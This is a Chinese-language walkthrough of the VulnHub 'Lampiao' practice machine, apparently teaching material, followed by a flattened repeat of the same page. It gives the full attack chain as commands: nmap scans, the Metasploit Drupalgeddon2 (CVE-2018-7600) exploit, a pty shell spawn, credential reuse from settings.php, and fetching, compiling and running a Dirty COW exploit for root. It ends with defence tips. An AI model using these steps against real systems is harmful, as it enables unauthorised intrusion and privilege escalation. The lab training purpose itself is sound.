vulnhub|渗透测试lampiao
字数 1297 2025-08-29 08:32:24

Vulnhub靶机Lampiao渗透测试教学文档

环境准备

靶机信息

  • 名称: Lampiao
  • 下载链接:
  • 大小: 669MB

网络配置

  • 攻击机(Kali Linux) IP: 10.10.10.128
  • 靶机IP: 10.10.10.129 (通过DHCP自动分配)

渗透测试步骤

1. 主机发现

使用nmap进行主机扫描:

nmap -sP 192.168.107.1/24

确认靶机IP为10.10.10.129

2. 端口扫描

初始扫描常用端口:

nmap -sS 10.10.10.129

仅发现22端口开放,但SSH弱口令爆破未成功。

全面扫描所有端口:

nmap -p- 10.10.10.129

发现1898端口开放Web服务。

3. Web服务枚举

访问http://10.10.10.129:1898进行信息收集

目录扫描

使用御剑扫描工具发现:

  • /robots.txt
  • /CHANGELOG.txt

从CHANGELOG.txt确认网站使用Drupal 7.54框架

4. 漏洞利用

搜索Drupal相关漏洞:

msfconsole
msf > search drupal

发现CVE-2018-7600远程代码执行漏洞

使用Metasploit利用该漏洞:

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 10.10.10.129
set RPORT 1898
run

成功获取www-data权限的shell

5. 获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

6. 信息收集与横向移动

在网站目录中发现可疑文件:

  • audio.m4a: 提示用户tiago
  • lampiao.jpg
  • LuizGonzaga-LampiaoFalou.mp3
  • qrc.png (扫描结果为鼓励信息)

在/var/www/html/sites/default/settings.php中发现数据库凭据:

  • 用户名: tiago
  • 密码: [从配置文件中获取]

尝试SSH登录tiago用户成功

7. 数据库访问

发现MySQL root密码与tiago用户密码相同,成功访问MySQL:

mysql -u root -p

查看drupal数据库获取网站用户信息

8. 权限提升

内核提权

检查内核版本:

uname -a

发现系统为Ubuntu 14.04.5 (2016年8月),存在脏牛(Dirty Cow)漏洞(CVE-2016-5195)

下载并编译漏洞利用代码:

wget https://www.exploit-db.com/download/40847.cpp -O dirtycow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dirtycow.cpp -lutil
./dcow -s

成功获取root权限

9. 获取flag

cd /root
cat flag.txt

关键知识点总结

  1. 全面端口扫描:使用-p-参数扫描所有65535个端口,避免遗漏非常规服务端口

  2. CMS漏洞利用

    • Drupal CVE-2018-7600远程代码执行漏洞
    • 使用Metasploit模块快速利用已知漏洞
  3. 权限提升技术

    • 通过配置文件泄露获取数据库和系统凭据
    • 脏牛漏洞利用流程:下载→编译→执行
    • 内核漏洞利用条件:版本匹配+有编译环境
  4. 信息收集技巧

    • 检查robots.txt和CHANGELOG.txt等标准文件
    • 分析网站配置文件获取敏感信息
    • 检查非常规文件(如音频、图片)中可能隐藏的线索
  5. 工具使用

    • nmap全面扫描
    • Metasploit框架利用已知漏洞
    • gcc编译本地提权利用代码

防御建议

  1. 及时更新CMS系统和插件
  2. 限制配置文件的访问权限
  3. 使用最小权限原则运行服务
  4. 定期更新操作系统内核
  5. 监控非常规端口的开放情况
  6. 避免在配置文件中硬编码敏感信息
Vulnhub靶机Lampiao渗透测试教学文档 环境准备 靶机信息 名称: Lampiao 下载链接: 主链接: Mega.nz 镜像链接: Vulnhub 种子文件: Torrent 大小: 669MB 网络配置 攻击机(Kali Linux) IP: 10.10.10.128 靶机IP: 10.10.10.129 (通过DHCP自动分配) 渗透测试步骤 1. 主机发现 使用nmap进行主机扫描: 确认靶机IP为10.10.10.129 2. 端口扫描 初始扫描常用端口: 仅发现22端口开放,但SSH弱口令爆破未成功。 全面扫描所有端口: 发现1898端口开放Web服务。 3. Web服务枚举 访问http://10.10.10.129:1898进行信息收集 目录扫描 使用御剑扫描工具发现: /robots.txt /CHANGELOG.txt 从CHANGELOG.txt确认网站使用Drupal 7.54框架 4. 漏洞利用 搜索Drupal相关漏洞: 发现CVE-2018-7600远程代码执行漏洞 使用Metasploit利用该漏洞: 成功获取www-data权限的shell 5. 获取交互式shell 6. 信息收集与横向移动 在网站目录中发现可疑文件: audio.m4a: 提示用户tiago lampiao.jpg LuizGonzaga-LampiaoFalou.mp3 qrc.png (扫描结果为鼓励信息) 在/var/www/html/sites/default/settings.php中发现数据库凭据: 用户名: tiago 密码: [ 从配置文件中获取 ] 尝试SSH登录tiago用户成功 7. 数据库访问 发现MySQL root密码与tiago用户密码相同,成功访问MySQL: 查看drupal数据库获取网站用户信息 8. 权限提升 内核提权 检查内核版本: 发现系统为Ubuntu 14.04.5 (2016年8月),存在脏牛(Dirty Cow)漏洞(CVE-2016-5195) 下载并编译漏洞利用代码: 成功获取root权限 9. 获取flag 关键知识点总结 全面端口扫描 :使用 -p- 参数扫描所有65535个端口,避免遗漏非常规服务端口 CMS漏洞利用 : Drupal CVE-2018-7600远程代码执行漏洞 使用Metasploit模块快速利用已知漏洞 权限提升技术 : 通过配置文件泄露获取数据库和系统凭据 脏牛漏洞利用流程:下载→编译→执行 内核漏洞利用条件:版本匹配+有编译环境 信息收集技巧 : 检查robots.txt和CHANGELOG.txt等标准文件 分析网站配置文件获取敏感信息 检查非常规文件(如音频、图片)中可能隐藏的线索 工具使用 : nmap全面扫描 Metasploit框架利用已知漏洞 gcc编译本地提权利用代码 防御建议 及时更新CMS系统和插件 限制配置文件的访问权限 使用最小权限原则运行服务 定期更新操作系统内核 监控非常规端口的开放情况 避免在配置文件中硬编码敏感信息